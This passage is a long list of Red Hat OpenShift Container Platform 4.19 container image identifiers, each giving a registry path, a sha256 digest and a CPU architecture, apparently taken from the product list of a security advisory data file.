"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
